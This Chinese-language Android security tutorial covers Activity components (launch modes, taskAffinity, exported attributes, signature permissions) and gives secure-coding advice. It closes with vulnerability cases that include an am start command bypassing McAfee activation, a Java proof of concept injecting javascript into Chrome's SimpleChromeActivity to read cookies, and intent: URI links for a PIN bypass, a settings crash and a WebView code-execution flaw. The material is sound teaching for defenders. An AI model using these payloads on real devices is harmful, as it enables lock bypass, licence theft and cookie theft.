Android每一個Application都是由Activity、Service、content Provider和Broadcast Receiver等Android的基本組件所組成,其中Activity是實現應用程序的主體,它承擔了大量的顯示和交互工作,甚至可以理解為一個"界面"就是一個Activity。
Activity是為用戶操作而展示的可視化用戶界面。比如說,一個activity可以展示一個菜單項列表供用戶選擇,或者顯示一些包含說明的照片。一個短消息應用程序可以包括一個用于顯示做為發送對象的聯系人的列表的activity,一個給選定的聯系人寫短信的activity以及翻閱以前的短信和改變設置的activity。盡管它們一起組成了一個內聚的用戶界面,但其中每個activity都與其它的保持獨立。每個都是以Activity類為基類的子類實現。
一個應用程序可以只有一個activity,或如剛才提到的短信應用程序那樣,包含很多個。每個activity的作用,以及其數目,自然取決于應用程序及其設計。一般情況下,總有一個應用程序被標記為用戶在應用程序啟動的時候第一個看到的。從一個activity轉向另一個的方式是靠當前的activity啟動下一個。
參考:http://developer.android.com/guide/components/activities.html
生命周期
啟動方式
顯示啟動
配置文件中注冊組件
<activity android:name=".ExampleActivity" android:icon="@drawable/app_icon">
<intent-filter>
<action android:name="android.intent.action.MAIN" />
<category android:name="android.intent.category.LAUNCHER" />
</intent-filter>
</activity>
直接使用intent對象指定application以及activity啟動
Intent intent = new Intent(this, ExampleActivity.class);
startActivity(intent);
未配置intent-filter的action屬性,activity只能使用顯示啟動。
私有Activity推薦使用顯示啟動。
隱式啟動
Intent intent = new Intent(Intent.ACTION_SEND);
intent.putExtra(Intent.EXTRA_EMAIL, recipientArray);
startActivity(intent);
加載模式launch mode
Activity有四種加載模式:
設置的位置在AndroidManifest.xml文件中activity元素的android:launchMode 屬性:
<activity android:name="ActB" android:launchMode="singleTask"></activity>
Activity launch mode 用于控制創建task和Activity實例。默認“standard“模式。Standard模式一次啟動即會生成一個新的Activity實例并且不會創建新的task,被啟動的Activity和啟動的Activity在同一個棧中。當創建新的task時,intent中的內容有可能被惡意應用讀取所以建議若無特別需求使用默認的standard模式即不配置launch mode屬性。launchMode能被Intent 的flag覆蓋。
taskAffinity
android系統中task管理Activity。Task的命名取決于root Activity的affinity。
默認情況下,app中的每個Activity都使用app的包名作為affinity。而Task的分配取決于app,故默認情況下一個app中所有的Activity屬于同一task。要改變task的分配,可以在AndroidManifest.xml文件中設置affinity的值,但是這樣做會有不同task啟動Activity攜帶的intent中的信息被其他應用讀取的風險。
FLAG_ACTIVITY_NEW_TASK
intent flag中一個重要的flag
啟動Activity時通過setFlags()或者addFlags()方法設置intent的flags屬性能夠改變launch mode,FLAG_ACTIVITY_NEW_TASK標記代表創建新的task(被啟動的Activity既不在前臺也不在后臺)。FLAG_ACTIVITY_MULTIPLE_TASK標記能和FLAG_ACTIVITY_NEW_TASK同時設置。這種情況下必會創建的task,所以intent中不應攜帶敏感數據。
Task
stack:Activity承擔了大量的顯示和交互工作,從某種角度上將,我們看見的應用程序就是許多個Activity的組合。為了讓這許多 Activity協同工作而不至于產生混亂,Android平臺設計了一種堆棧機制用于管理Activity,其遵循先進后出的原則,系統總是顯示位于棧頂的Activity,位于棧頂的Activity也就是最后打開的Activity。
Task:是指將相關的Activity組合到一起,以Activity Stack的方式進行管理。從用戶體驗上講,一個“應用程序”就是一個Task,但是從根本上講,一個Task是可以有一個或多個Android Application組成的
如果用戶離開一個task很長時間,系統會清理棧頂以下的activity,這樣task被從新打開時,棧頂activity就被還原了。
Intent Selector
多個Activity具有相同action時,當此調用此action時會彈出一個選擇器供用戶選擇。
權限
android:exported
一個Activity組件能否被外部應用啟動取決于此屬性,設置為true時Activity可以被外部應用啟動,設置為false則不能,此時Activity只能被自身app啟動。(同user id或者root也能啟動)
沒有配置intent-filter的action屬性exported默認為false(沒有filter只能通過明確的類名來啟動activity故相當于只有程序本身能啟動),配置了intent-filter的action屬性exported默認為true。
exported屬性只是用于限制Activity是否暴露給其他app,通過配置文件中的權限申明也可以限制外部啟動activity。
android:protectionLevel
http://developer.android.com/intl/zh-cn/guide/topics/manifest/permission-element.html
normal:默認值。低風險權限,只要申請了就可以使用,安裝時不需要用戶確認。
dangerous:像WRITE_SETTING和SEND_SMS等權限是有風險的,因為這些權限能夠用來重新配置設備或者導致話費。使用此protectionLevel來標識用戶可能關注的一些權限。Android將會在安裝程序時,警示用戶關于這些權限的需求,具體的行為可能依據Android版本或者所安裝的移動設備而有所變化。
signature:這些權限僅授予那些和本程序應用了相同密鑰來簽名的程序。
signatureOrSystem:與signature類似,除了一點,系統中的程序也需要有資格來訪問。這樣允許定制Android系統應用也能獲得權限,這種保護等級有助于集成系統編譯過程。
<!-- *** POINT 1 *** Define a permission with protectionLevel="signature" -->
<permission
android:name="org.jssec.android.permission.protectedapp.MY_PERMISSION"
android:protectionLevel="signature" />
<application
android:icon="@drawable/ic_launcher"
android:label="@string/app_name" >
<!-- *** POINT 2 *** For a component, enforce the permission with its permission attribute -->
<activity
android:name=".ProtectedActivity"
android:exported="true"
android:label="@string/app_name"
android:permission="org.jssec.android.permission.protectedapp.MY_PERMISSION" >
<!-- *** POINT 3 *** If the component is an activity, you must define no intent-filter -->
</activity>
關鍵方法
Activity類型和使用方式決定了其風險和防御方式,故將Activity分類如下: Private、Public、Parter、In-house
私有Activity不應被其他應用啟動相對是安全的
創建activity時:
1、不指定taskAffinity //task管理activity。task的名字取決于根activity的affinity。默認設置中Activity使用包名做為affinity。task由app分配,所以一個應用的Activity在默認情況下屬于相同task。跨task啟動Activity的intent有可能被其他app讀取到。
2、不指定lunchMode //默認standard,建議使用默認。創建新task時有可能被其他應用讀取intent的內容。
3、設置exported屬性為false
4、謹慎處理從intent中接收的數據,不管是否內部發送的intent
5、敏感信息只能在應用內部操作
使用activity時:
6、開啟activity時不設置FLAG_ACTIVITY_NEW_TASK標簽 //FLAG_ACTIVITY_NEW_TASK標簽用于創建新task(被啟動的Activity并未在棧中)。
7、開啟應用內部activity使用顯示啟動的方式
8、當putExtra()包含敏感信息目的應是app內的activity
9、謹慎處理返回數據,即可數據來自相同應用
公開暴露的Activity組件,可以被任意應用啟動
創建activity:
1、設置exported屬性為true
2、謹慎處理接收的intent
3、有返回數據時不應包含敏感信息
使用activity:
4、不應發送敏感信息
5、當收到返回數據時謹慎處理
Parter、in-house部分參閱http://www.jssec.org/dl/android_securecoding_en.pdf
安全建議
查看activity:
啟動activity:
案例1:繞過本地認證
WooYun: 華為網盤android客戶端本地密碼繞過(非root也可以)
繞過McAfee的key驗證,免費激活。
$ am start -a android.intent.action.MAIN -n com.wsandroid.suite/com.mcafee.main.MfeMain
案例2:本地拒絕服務
WooYun: Tencent Messenger(QQ) Dos vulnerability(critical)
WooYun: Tencent WeiBo multiple Dos vulnerabilities(critical)
WooYun: Android原生的Settings應用存在必現崩潰問題(可造成拒絕服務攻擊) (涉及fragment)
案例3:界面劫持
WooYun: android利用懸浮窗口實現界面劫持釣魚盜號
案例4:UXSS
漏洞存在于Chrome Android版本v18.0.1025123,class "com.google.android.apps.chrome.SimpleChromeActivity" 允許惡意應用注入js代碼到任意域. 部分 AndroidManifest.xml配置文件如下
<activity android:name="com.google.android.apps.chrome.SimpleChromeActivity" android:launchMode="singleTask" android:configChanges="keyboard|keyboardHidden|orientation|screenSize">
<intent-filter>
<action android:name="android.intent.action.VIEW" />
<category android:name="android.intent.category.DEFAULT" />
</intent-filter>
</activity>
Class "com.google.android.apps.chrome.SimpleChromeActivity" 配置
public class TestActivity extends Activity {
@Override
public void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
Intent i = new Intent();
ComponentName comp = new ComponentName(
"com.android.chrome",
"com.google.android.apps.chrome.SimpleChromeActivity");
i.setComponent(comp);
i.setAction("android.intent.action.VIEW");
Uri data = Uri.parse("http://google.com");
i.setData(data);
startActivity(i);
try {
Thread.sleep(5000);
}
catch (Exception e) {}
data = Uri.parse("javascript:alert(document.cookie)");
i.setData(data);
startActivity(i);
}
}
案例5:隱式啟動intent包含敏感數據
暫缺可公開案例,攻擊模型如下圖。
案例6:Fragment注入(繞過PIN+拒絕服務)
Fragment這里只提一下,以后可能另寫一篇。
<a href="intent:#Intent;S.:android:show_fragment=com.android.settings.ChooseLockPassword$ChooseLockPasswordFragment;B.confirm_credentials=false;launchFlags=0x00008000;SEL;action=android.settings.SETTINGS;end">
16、bypass Pin android 3.0-4.3 (selector)
</a><br>
<a href="intent:#Intent;S.:android:show_fragment=XXXX;launchFlags=0x00008000;SEL;component=com.android.settings/com.android.settings.Settings;end">
17、fragment dos android 4.4 (selector)
</a><br>
案例7:webview RCE
<a href="intent:#Intent;component=com.gift.android/.activity.WebViewIndexActivity;S.url=http://drops.wooyun.org/webview.html;S.title=WebView;end">
15、驢媽媽代碼執行(fixed)
</a><br>
http://www.jssec.org/dl/android_securecoding_en.pdf